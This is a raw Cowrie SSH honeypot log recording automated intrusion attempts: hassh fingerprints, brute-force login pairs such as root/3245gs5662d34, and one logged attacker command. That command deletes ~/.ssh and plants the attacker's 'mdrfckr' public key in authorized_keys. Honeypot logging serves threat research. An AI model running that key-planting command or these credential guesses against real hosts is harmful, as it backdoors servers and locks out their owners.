{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:57:51.992862Z","src_ip":"212.227.235.229","session":"170e50835bdd"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T00:57:51.993563Z","src_ip":"212.227.235.229","session":"170e50835bdd"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T00:57:52.240806Z","src_ip":"212.227.235.229","session":"170e50835bdd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:57:52.241659Z","src_ip":"212.227.235.229","session":"170e50835bdd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33232,"dst_ip":"1.2.3.4","dst_port":22,"session":"fe1782809c19","protocol":"ssh","message":"New connection: 212.227.235.229:33232 (1.2.3.4:22) [session: fe1782809c19]","sensor":"my-vps","timestamp":"2025-08-31T00:57:52.478518Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:57:52.484372Z","src_ip":"212.227.235.229","session":"fe1782809c19"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:57:52.720043Z","src_ip":"212.227.235.229","session":"fe1782809c19"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57178,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ce910b540d2","protocol":"ssh","message":"New connection: 212.227.125.160:57178 (1.2.3.4:22) [session: 1ce910b540d2]","sensor":"my-vps","timestamp":"2025-08-31T00:57:53.278072Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:57:53.279847Z","src_ip":"212.227.125.160","session":"1ce910b540d2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:57:53.352875Z","src_ip":"212.227.125.160","session":"1ce910b540d2"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"123","message":"login attempt [hadoop/123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:57:53.573558Z","src_ip":"212.227.125.160","session":"1ce910b540d2"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T00:57:53.676322Z","src_ip":"212.227.235.229","session":"fe1782809c19"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:57:54.713971Z","src_ip":"212.227.125.160","session":"1ce910b540d2"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:57:54.918454Z","src_ip":"212.227.235.229","session":"fe1782809c19"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34692,"dst_ip":"1.2.3.4","dst_port":22,"session":"ee7febe654ba","protocol":"ssh","message":"New connection: 212.227.235.229:34692 (1.2.3.4:22) [session: ee7febe654ba]","sensor":"my-vps","timestamp":"2025-08-31T00:57:55.139732Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:57:55.141822Z","src_ip":"212.227.235.229","session":"ee7febe654ba"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:57:55.380400Z","src_ip":"212.227.235.229","session":"ee7febe654ba"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:57:56.355724Z","src_ip":"212.227.235.229","session":"ee7febe654ba"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:57:56.594296Z","src_ip":"212.227.235.229","session":"ee7febe654ba"}
{"eventid":"cowrie.session.closed","duration":"7.1","message":"Connection lost after 7.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:57:56.598686Z","src_ip":"212.227.235.229","session":"170e50835bdd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48946,"dst_ip":"1.2.3.4","dst_port":22,"session":"2852c9a2429f","protocol":"ssh","message":"New connection: 212.227.125.160:48946 (1.2.3.4:22) [session: 2852c9a2429f]","sensor":"my-vps","timestamp":"2025-08-31T00:57:58.617968Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:57:59.009964Z","src_ip":"212.227.125.160","session":"2852c9a2429f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:57:59.011681Z","src_ip":"212.227.125.160","session":"2852c9a2429f"}
{"eventid":"cowrie.login.failed","username":"debian","password":"1234567","message":"login attempt [debian/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T00:58:00.313982Z","src_ip":"212.227.125.160","session":"2852c9a2429f"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:58:01.870492Z","src_ip":"212.227.125.160","session":"2852c9a2429f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46906,"dst_ip":"1.2.3.4","dst_port":22,"session":"e8898b023791","protocol":"ssh","message":"New connection: 212.227.125.160:46906 (1.2.3.4:22) [session: e8898b023791]","sensor":"my-vps","timestamp":"2025-08-31T00:58:03.682847Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:58:03.684149Z","src_ip":"212.227.125.160","session":"e8898b023791"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:58:03.759053Z","src_ip":"212.227.125.160","session":"e8898b023791"}
{"eventid":"cowrie.login.failed","username":"bot","password":"bot","message":"login attempt [bot/bot] failed","sensor":"my-vps","timestamp":"2025-08-31T00:58:03.985798Z","src_ip":"212.227.125.160","session":"e8898b023791"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:58:05.097082Z","src_ip":"212.227.125.160","session":"e8898b023791"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48608,"dst_ip":"1.2.3.4","dst_port":22,"session":"517cf1e9ed71","protocol":"ssh","message":"New connection: 212.227.125.160:48608 (1.2.3.4:22) [session: 517cf1e9ed71]","sensor":"my-vps","timestamp":"2025-08-31T00:58:14.140321Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:58:14.140991Z","src_ip":"212.227.125.160","session":"517cf1e9ed71"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:58:14.214288Z","src_ip":"212.227.125.160","session":"517cf1e9ed71"}
{"eventid":"cowrie.login.failed","username":"debianuser","password":"1qazXSW@","message":"login attempt [debianuser/1qazXSW@] failed","sensor":"my-vps","timestamp":"2025-08-31T00:58:14.435228Z","src_ip":"212.227.125.160","session":"517cf1e9ed71"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:58:15.528977Z","src_ip":"212.227.125.160","session":"517cf1e9ed71"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39984,"dst_ip":"1.2.3.4","dst_port":22,"session":"1eaf809d2bb9","protocol":"ssh","message":"New connection: 212.227.125.160:39984 (1.2.3.4:22) [session: 1eaf809d2bb9]","sensor":"my-vps","timestamp":"2025-08-31T00:58:24.640108Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:58:24.641278Z","src_ip":"212.227.125.160","session":"1eaf809d2bb9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:58:24.715830Z","src_ip":"212.227.125.160","session":"1eaf809d2bb9"}
{"eventid":"cowrie.login.failed","username":"ranger","password":"ranger","message":"login attempt [ranger/ranger] failed","sensor":"my-vps","timestamp":"2025-08-31T00:58:24.996255Z","src_ip":"212.227.125.160","session":"1eaf809d2bb9"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:58:26.143570Z","src_ip":"212.227.125.160","session":"1eaf809d2bb9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52324,"dst_ip":"1.2.3.4","dst_port":22,"session":"3bb7938fef2d","protocol":"ssh","message":"New connection: 212.227.125.160:52324 (1.2.3.4:22) [session: 3bb7938fef2d]","sensor":"my-vps","timestamp":"2025-08-31T00:58:35.031927Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:58:35.032612Z","src_ip":"212.227.125.160","session":"3bb7938fef2d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:58:35.106002Z","src_ip":"212.227.125.160","session":"3bb7938fef2d"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"abc123","message":"login attempt [oracle/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:58:35.325699Z","src_ip":"212.227.125.160","session":"3bb7938fef2d"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:58:36.463771Z","src_ip":"212.227.125.160","session":"3bb7938fef2d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41222,"dst_ip":"1.2.3.4","dst_port":22,"session":"06ebb1292291","protocol":"ssh","message":"New connection: 212.227.235.229:41222 (1.2.3.4:22) [session: 06ebb1292291]","sensor":"my-vps","timestamp":"2025-08-31T00:58:40.280281Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:58:41.290040Z","src_ip":"212.227.235.229","session":"06ebb1292291"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:58:41.290739Z","src_ip":"212.227.235.229","session":"06ebb1292291"}
